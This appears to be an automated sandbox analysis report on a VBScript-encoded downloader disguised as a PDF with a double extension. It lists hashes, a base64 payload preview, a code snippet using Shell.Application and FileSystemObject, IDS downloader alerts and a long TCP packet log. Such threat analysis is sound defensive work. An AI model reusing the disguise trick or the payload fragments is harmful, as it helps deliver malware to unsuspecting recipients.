                                                                SHA1:EFB37FCF98ED3C2F9DB2CA9D49F8133122DBBD9F
                                                                SHA-256:1EF910E64AED9CB83CC2079E49863D97BAA4D8AC7551B63A5EA4000B62CA0174
                                                                SHA-512:05A2C0DCBD25A933B894A2141655E782DB003BCACE99AB617E520F37BBAC001F088048B7C0DD93CE4CD812E8CAF618D730303E517BCDDDC0989328C6BD4A59C6
                                                                Malicious:false
                                                                Preview:cQGb6wIdtrswnhYAcQGb6wJdpgNcJARxAZtxAZu5MbnajHEBm3EBm4Hx7zmq3esC9lNxAZuBwSJ/j65xAZvrAunvcQGb6wLAsbpqHPJOcQGb6wIkZXEBm3EBmzHKcQGbcQGbiRQL6wINPesClJPR4usCWh7rAnqbg8EEcQGbcQGbgfmQ5KsDfMzrAuT0cQGbi0QkBHEBm3EBm4nDcQGbcQGbgcPM++0B6wIbtHEBm7pvhHwjcQGbcQGbgepH0V4zcQGbcQGbgeoosx3wcQGb6wJpX3EBm3EBm3EBm3EBm4sMEHEBm3EBm4kME3EBm+sCLTVC6wI/husCrpeB+ozQBAB11usC+o3rAgNuiVwkDOsC/qpxAZuB7QADAABxAZvrAnNPi1QkCOsC/xTrArXCi3wkBOsC0HnrAog8ietxAZtxAZuBw5wAAADrAjC7cQGbU3EBm3EBm2pA6wIVq+sCDPiJ6+sCtI3rAoq7x4MAAQAAAJDFA+sCRebrAsBfgcMAAQAA6wLY5esC7j1T6wJ3zesCvWSJ63EBm3EBm4m7BAEAAOsCJbHrAow2gcMEAQAAcQGb6wJAfVPrArWEcQGbav9xAZtxAZuDwgXrArH36wLuHzH2cQGb6wIFcjHJcQGbcQGbixpxAZtxAZtB6wIJrXEBmzkcCnXz6wJAm+sCGf1G6wKPPXEBm4B8Cvu4ddzrAulc6wI2sItECvxxAZvrAlJjKfDrAtrRcQGb/9LrApLZcQGbuozQBABxAZtxAZsxwHEBm+sCS5WLfCQM6wISlXEBm4E0B7EyuHzrAhIF6wLexoPABOsC6DzrAm+sOdB14usCJZLrAqrlifvrAtdxcQGb/9dxAZtxAZuJzFB8sTK4inOm40V6skL3ONc5kHBM+nUw9nkH8zvt9VSL7xZ+sTm9iRxEMTDDtOIyvzmNKjTwIDXX3vl49fxxsX2D+aOzzHGxgn/mfbPMcbENjRE8tmL9xT+4vHhA6/hF9T3K

                                                                Static File Info

                                                                General

                                                                File type:ASCII text, with very long lines (356), with CRLF line terminators
                                                                Entropy (8bit):5.282068201676989
                                                                TrID:
                                                                  File name:LSMU CITATA LT 20-11-2024#U00b7pdf.vbe
                                                                  File size:12'061 bytes
                                                                  MD5:df045c185b46e8c2432ea266b0671f86
                                                                  SHA1:db27134d7be95240a1349bbcd1a1dcfa0dfb3506
                                                                  SHA256:27ab626711706fe4699ec17a7d7e0cd6aa2181ac87d7693cf55ef728242d4181
                                                                  SHA512:99306cbf23bf7a00a398849ca8ff25ce9ab1659f686e28e3e843b1a1632637495c177044173e70ad58571e2d856f4aa4e4b22b2e48e9a8cc3944feabeb4e11ae
                                                                  SSDEEP:192:1P3nxwOrFEWWm60w5HPZMy35kCktIFc/T+zxLQkQUYUu59ynvT/1dut4VXcz1Xzy:9pJEWM08HRdyCHFsaFQkQUYhivZktOMc
                                                                  TLSH:7242B65FBF1F127F51E931988BBD0F2B5954CB64C13A3C6969B93FC680C5A043628A2D
                                                                  File Content Preview:......Lactiformdemark = MidB("bastarder", 252, 252)....Set Thalamotomies = CreateObject("Shell.Application")....Set Choryos = CreateObject("Scripting.FileSystemObject")........Set Fucatious = Choryos.OpenTextFile("C:\Windows\notepad.exe", 1)......Do While

                                                                  File Icon

                                                                  Icon Hash:68d69b8f86ab9a86

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-20T16:53:24.730471+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549723172.217.19.174443TCP
                                                                  2024-11-20T16:53:56.419547+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549799172.217.19.174443TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 20, 2024 16:53:14.895920992 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:14.895962954 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:14.896239042 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:14.904230118 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:14.904249907 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:16.651998997 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:16.652087927 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:16.652837992 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:16.652893066 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:16.656306028 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:16.656316042 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:16.656573057 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:16.667576075 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:16.715337992 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:17.575370073 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:17.575448036 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:17.577857971 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:17.577919960 CET44349718172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:17.577974081 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:17.579736948 CET49718443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:22.009912968 CET49723443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:22.009967089 CET44349723172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:22.010102034 CET49723443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:22.010405064 CET49723443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:22.010422945 CET44349723172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:23.797748089 CET44349723172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:23.806421995 CET49723443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:23.806457996 CET44349723172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:24.730418921 CET44349723172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:24.736318111 CET44349723172.217.19.174192.168.2.5
                                                                  Nov 20, 2024 16:53:24.736393929 CET49723443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:24.736854076 CET49723443192.168.2.5172.217.19.174
                                                                  Nov 20, 2024 16:53:24.737332106 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:24.737379074 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:24.737452030 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:24.737695932 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:24.737711906 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:26.483947992 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:26.484030008 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:26.486566067 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:26.486577988 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:26.486932993 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:26.488014936 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:26.531337023 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.308593988 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.308710098 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.323041916 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.323172092 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.507894993 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.508088112 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.508121967 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.513922930 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.514045954 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.514072895 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.520627022 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.520726919 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.520755053 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.530813932 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.530898094 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.530926943 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.546745062 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.546854019 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.546885967 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.555144072 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.555214882 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.555226088 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.566478014 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.566567898 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.566576958 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.576066971 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.576132059 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.576159000 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.585937023 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.586160898 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.586195946 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.595633984 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.595711946 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.595741987 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629451036 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629493952 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629528046 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.629560947 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.629618883 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.633661032 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.642200947 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.642292976 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.642318964 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.676203012 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.676297903 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.676322937 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.712583065 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.712656021 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.712681055 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.717473984 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.717531919 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.717541933 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.724266052 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.724344969 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.724354029 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.731601000 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.731638908 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.731667995 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.731677055 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.731723070 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.737862110 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.743680000 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.743774891 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.743788004 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.749867916 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.749943018 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.749954939 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.758208990 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.758253098 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.758263111 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.765081882 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.765162945 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.765171051 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.768378019 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.768428087 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.768435955 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.776159048 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.776245117 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.776253939 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.785244942 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.785398960 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.785413980 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.795109034 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.795193911 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.795222998 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.804518938 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.804580927 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.804609060 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.814120054 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.814188957 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.814199924 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.833578110 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.833756924 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.833771944 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.835577965 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.835664034 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.835674047 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.839524031 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.839596033 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.839607000 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.848220110 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.849025011 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.849045992 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.854247093 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.854300976 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.854317904 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.860861063 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.860922098 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.860938072 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.875658035 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.875721931 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.875754118 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.877366066 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.877425909 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.877450943 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.914541006 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.914608955 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.914644957 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.916692019 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.916764975 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.916779995 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.919435024 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.919511080 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.919539928 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.922403097 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.922465086 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.922493935 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.924432993 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.924555063 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.924573898 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.925700903 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.925774097 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.925791979 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.931242943 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.931324959 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.931354046 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.933650970 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.933713913 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.933736086 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.939229965 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.939274073 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.939294100 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.939331055 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.939376116 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.941729069 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.948218107 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.948272943 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.948301077 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.949590921 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.949636936 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.949646950 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.958093882 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.958211899 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.958233118 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.959439039 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.959501028 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.959520102 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.968225956 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.968308926 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.968338966 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.969862938 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.969927073 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.969959021 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.977921009 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.977986097 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.978018045 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.979708910 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.979775906 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.979796886 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.982763052 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.982826948 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.982852936 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.988910913 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.989053011 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.989078999 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.992016077 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.993990898 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.994013071 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.998678923 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:29.998744965 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:29.998776913 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.000946045 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.001056910 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.001080990 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.008047104 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.008107901 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.008136988 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.010447025 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.010507107 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.010540962 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.015341997 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.015383005 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.015408993 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.015436888 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.015475035 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.031507969 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.031574965 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.031610012 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.031639099 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.031645060 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.031682014 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.031699896 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.047548056 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.047589064 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.047616959 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.047636032 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.047672033 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.047688961 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.059681892 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.059747934 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.059777021 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.060717106 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.060770035 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.060789108 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.064315081 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.064392090 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.064413071 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.066256046 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.066315889 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.066337109 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.068126917 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.068188906 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.068205118 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.070044041 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.070168972 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.070177078 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.071830988 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.071887970 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.071894884 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.074132919 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.074259043 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.074268103 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.077075958 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.077141047 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.077148914 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.078191996 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.078347921 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.078377962 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.079770088 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.079933882 CET49729443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:53:30.079943895 CET44349729142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:53:30.081398010 CET44349729142.250.181.1192.168.2.5
